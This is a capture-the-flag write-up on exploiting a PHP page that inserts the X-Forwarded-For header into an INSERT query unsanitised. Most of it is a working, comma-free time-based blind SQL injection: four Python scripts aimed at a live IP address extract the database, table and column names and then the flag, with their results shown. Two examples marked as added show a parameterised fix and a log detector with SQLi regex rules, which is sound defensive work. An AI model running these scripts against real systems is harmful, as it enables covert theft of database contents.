Points tested:
- X-Forwarded-For (XFF) header injection
- INSERT INTO injection, with the payload shape
  1'+(injected statement)#
- time-based blind injection
- comma filtering: because of
  $ip_arr = explode(',', $ip);
  the if() function cannot be used in the injection, and the lesson that comes from switching to another form of substr
The challenge gives this source hint:
```php
<?php
error_reporting(0);
function getIp(){
    $ip = '';
    if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
        $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
    }else{
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    $ip_arr = explode(',', $ip);
    ## commas are filtered: only the part before the first comma is kept
    return $ip_arr[0];
}
$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
?>
```
Commas are filtered, and the injection point is an INSERT.
Let's first look at the INSERT injection approach: there are no error messages and no query results echoed back, so only time-based injection is possible.
There is a measurable delay, so time-based injection works.
But with commas filtered, the if() statement can't be used.
There is, however, another conditional construct: select case when <condition> then <statement 1> else <statement 2> end
OK, the delay fires. The last thing to work out is the injection condition: normally substr is used to extract and compare one character at a time, but the substr form we used before also needs commas. What now?
Learned another way to call substr: substr(database() from 1 for 1) is equivalent to substr(database(),1,1)
After that it's just a matter of writing a script.
First dump the database name:
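Added example, not from the original write-up or the challenge: the same INSERT done the way the PHP above should do it, written in Python with an in-memory sqlite3 database standing in for MySQL (the database, the request headers and the function names get_ip, parse_client_ip, record_ip, demo are all constructed here). It shows the two fixes a code reviewer would ask for: validate that the X-Forwarded-For value is actually an IP literal, and bind the value as a query parameter instead of concatenating it into the statement. Note that explode(',') in the original is not a defence at all, since the payload the write-up uses contains no comma.

```python
import ipaddress
import sqlite3

# Constructed payload with the shape used in the write-up (assumption: it is
# meant for a MySQL INSERT; under sqlite it would not even parse as SQL).
PAYLOAD = ("1'+(select case when (ascii(substr(database() from 1 for 1))=119)"
           " then sleep(3) else 0 end))#")


def get_ip(headers, remote_addr):
    """Same selection logic as the page's getIp(): prefer X-Forwarded-For and
    keep only the first comma-separated hop. The split is not a defence: the
    write-up's payload contains no comma."""
    raw = headers.get("X-Forwarded-For", remote_addr)
    return raw.split(",")[0].strip()


def parse_client_ip(value):
    """Return the canonical IP string, or None when the value is not an IP.
    ipaddress.ip_address() accepts only syntactically valid IPv4/IPv6
    literals, so SQL fragments never reach the database layer."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        return None


def record_ip(conn, value):
    """INSERT with a bound parameter: the driver sends the value as data,
    it is never interpolated into the statement text."""
    conn.execute("INSERT INTO client_ip (ip) VALUES (?)", (value,))
    conn.commit()


def stored_ips(conn):
    return [row[0] for row in conn.execute("SELECT ip FROM client_ip ORDER BY rowid")]


def demo():
    """Run three cases and return (payload_rejected, rows_in_table)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE client_ip (ip TEXT)")

    # 1. Ordinary request: the header carries a real address list.
    ip = parse_client_ip(get_ip({"X-Forwarded-For": "203.0.113.7, 10.0.0.2"}, "10.0.0.2"))
    record_ip(conn, ip)

    # 2. Hostile header: validation rejects it before any SQL is built.
    hostile = get_ip({"X-Forwarded-For": PAYLOAD}, "10.0.0.2")
    rejected = parse_client_ip(hostile) is None

    # 3. Even if an application chose to keep the raw header (e.g. for
    #    forensics), parameter binding stores it as an inert string.
    record_ip(conn, hostile)

    rows = stored_ips(conn)
    conn.close()
    return rejected, rows


if __name__ == "__main__":
    print(demo())
```

The same two changes translate directly to the PHP: reject the value unless filter_var() with FILTER_VALIDATE_IP accepts it, and run the INSERT through a prepared statement (mysqli or PDO) rather than through the legacy mysql_query() with string concatenation.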
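Added example, not part of the original post: a small detector for this class of payload, the kind of check a WAF rule or a log-review script would run over access logs. The log lines and their format are constructed, and all names here (SQLI_RULES, classify, analyse, SAMPLE_LOG) are mine. It specifically matches the comma-free forms the write-up relies on (case when ... then, substr(... from ... for ...)), since a filter that only strips commas does nothing against them, and it uses the response time only as a confirming signal once a content rule has fired, so a merely slow legitimate request is not flagged.

```python
import re
from collections import defaultdict

# Detection rules. The comma-free forms matter: the write-up shows if() and
# substr(x,1,1) replaced by "case when ... end" and "substr(x from 1 for 1)",
# so a filter that only keys on commas misses the whole technique.
SQLI_RULES = [
    ("case-when",       re.compile(r"\bcase\s+when\b.*?\bthen\b", re.I)),
    ("time-function",   re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("substr-from-for", re.compile(r"\bsubstr(ing)?\s*\(.*?\bfrom\b.*?\bfor\b", re.I)),
    ("schema-probe",    re.compile(r"\b(information_schema|group_concat)\b", re.I)),
    ("quote-break",     re.compile(r"'\s*[+)]|#\s*$")),
]
SLOW_MS = 2500   # a fired sleep(3) lands well above this; tune to your own baseline

# Assumed log format (constructed): <src> "<method> <path>" <status> <ms> xff="<value>"
LOG_LINE = re.compile(
    r'^(?P<src>\S+) "(?P<method>[A-Z]+) (?P<path>\S+)" (?P<status>\d{3}) '
    r'(?P<ms>\d+) xff="(?P<xff>[^"]*)"$'
)


def parse_line(line):
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of reasons this entry looks like an XFF injection probe
    ([] when clean). The timing signal is added only when a content rule has
    already fired."""
    xff = entry["xff"]
    reasons = []
    # Cheap structural check: a real XFF is a comma-separated list of IP literals.
    if xff and not re.fullmatch(r"[0-9A-Fa-f:.,\s]+", xff):
        reasons.append("xff-not-ip-list")
    for name, pattern in SQLI_RULES:
        if pattern.search(xff):
            reasons.append(name)
    if reasons and int(entry["ms"]) >= SLOW_MS:
        reasons.append("delay-confirmed")
    return reasons


def analyse(lines):
    """Return (flagged entries, probe count per source address).
    A blind extraction needs one request per candidate character, so the
    per-source count is the strongest signal even if single requests slip past."""
    flagged = []
    per_src = defaultdict(int)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            flagged.append((entry["src"], entry["xff"], reasons))
            per_src[entry["src"]] += 1
    return flagged, dict(per_src)


# Constructed sample log: one benign client and one source running the
# write-up's probe for the first character of the database name.
def log_line(src, ms, xff):
    return '%s "GET /web15/" 200 %d xff="%s"' % (src, ms, xff)

PROBE = ("1'+(select case when (ascii(substr(database() from 1 for 1))=%d)"
         " then sleep(3) else 0 end))#")
TABLE_PROBE = ("1'+(select case when (ascii(substr((select group_concat(table_name) "
               "from information_schema.tables where table_schema=database()) "
               "from 1 for 1))=99) then sleep(3) else 0 end))#")

SAMPLE_LOG = [
    log_line("198.51.100.9", 12, "203.0.113.7, 10.0.0.2"),
    log_line("198.51.100.9", 40, ""),
    log_line("192.0.2.44", 3010, PROBE % 119),   # guess 'w' correct: sleep fired
    log_line("192.0.2.44", 15, PROBE % 120),     # guess 'x' wrong: fast path
    log_line("192.0.2.44", 3005, TABLE_PROBE),
]

if __name__ == "__main__":
    for src, xff, reasons in analyse(SAMPLE_LOG)[0]:
        print(src, reasons)
```

On real logs the per-source count is what stands out: the scripts in this write-up send one request per candidate character for every position, so a single client address produces hundreds of requests whose X-Forwarded-For differs only in two numbers.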
```python
import requests

url = "http://123.206.87.240:8002/web15/"
# candidate characters; 'M' is last, so reaching it with no delay means the string has ended
allString = r'''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
databaseName = ''
flag = 1
for i in range(1, 10):
    for j in allString:
        header1 = {
            # comma-free payload: case when ... end replaces if(), substr(... from ... for ...) replaces substr(x,1,1)
            "X-Forwarded-For": "1'+(select case when (ascii(substr(database() from %d for 1))=%d) then sleep(3) else 0 end))#" % (i, ord(j))
        }
        r = requests.get(url, headers=header1)
        t = r.elapsed.total_seconds()
        # print('the time of ' + j + ' is ' + str(t))
        if t >= 3:
            print("No." + str(i) + " is " + str(j))
            databaseName = databaseName + j
            break
        elif t < 3 and str(j) == 'M':
            # every candidate tried without a delay: no more characters
            flag = 0
            break
    if flag == 0:
        break
print("databaseName:" + databaseName)
```
Result:
The database name is web15
Dump the table names:
```python
import requests

url = "http://123.206.87.240:8002/web15/"
allString = r'''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
tableName = ''
flag = 1
for i in range(1, 20):
    for j in allString:
        header1 = {
            # "X-Forwarded-For": "1'+(select case when (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from %d for 1))=%d) then sleep(3) else 0 end))#" % (i, ord(j))
            "X-Forwarded-For": "1'+(select case when (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = database()) from %d for 1))=%d) then sleep(3) else 0 end))#" % (i, ord(j))
        }
        r = requests.get(url, headers=header1)
        t = r.elapsed.total_seconds()
        print("the time of " + j + " is " + str(t))
        if t >= 3:
            print("No." + str(i) + " is " + j)
            tableName = tableName + j
            break
        elif t < 3 and j == "M":
            flag = 0
            break
    if flag == 0:
        break
print("tableName:" + tableName)
```
Here we have to allow for the server's own latency, so I set the delay threshold at 3 to 4 seconds
Result:
Table names: client_ip,flag
Dump the column names of the flag table:
```python
import requests

url = "http://123.206.87.240:8002/web15/"
allString = r'''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
colName = ''
flag = 1
for i in range(1, 20):
    for j in allString:
        header1 = {
            # "1'+(select case when (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag') from %d for 1))=%d) then sleep(3) else 0 end))#" % (i, ord(j))
            "X-Forwarded-For": "1'+(select case when( ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag') from %d for 1))=%d) then sleep(3) else 0 end))#" % (i, ord(j))
        }
        r = requests.get(url, headers=header1)
        t = r.elapsed.total_seconds()
        print("time of " + j + " is " + str(t))
        if t >= 3:
            print("No." + str(i) + " is " + j)
            colName = colName + j
            break
        elif t < 3 and j == "M":
            flag = 0
            break
    if flag == 0:
        break
print("colName: " + colName)
```
Result:
The column name is flag
Finally dump the data in the flag column:
```python
import requests

url = "http://123.206.87.240:8002/web15/"
allString = r'''1234567890~`!@#$%^&*()-_=+[]{};:'"|\,<.>/?qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'''
Name = ''
flag = 1
for i in range(1, 40):
    for j in allString:
        header1 = {
            # "1'+(select case when (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag') from %d for 1))=%d) then sleep(3) else 0 end))#" % (i, ord(j))
            "X-Forwarded-For": "1'+(select case when( ascii(substr((select group_concat(flag) from flag ) from %d for 1))=%d) then sleep(3) else 0 end))#" % (i, ord(j))
        }
        r = requests.get(url, headers=header1)
        t = r.elapsed.total_seconds()
        print("time of " + j + " is " + str(t))
        if t >= 3:
            print("No." + str(i) + " is " + j)
            Name = Name + j
            break
        elif t < 3 and j == "M":
            flag = 0
            break
    if flag == 0:
        break
print("flagName: " + Name)
```
Final flag: flag{cdbf14c9551d5be5612f7bb5d2867853}
Author: Somnus
Link: https://foxgrin.github.io/posts/26423/#INSERT-INTO%E6%B3%A8%E5%85%A5
Copyright belongs to the author. Contact the author for authorization before reprinting commercially; non-commercial reprints must credit the source.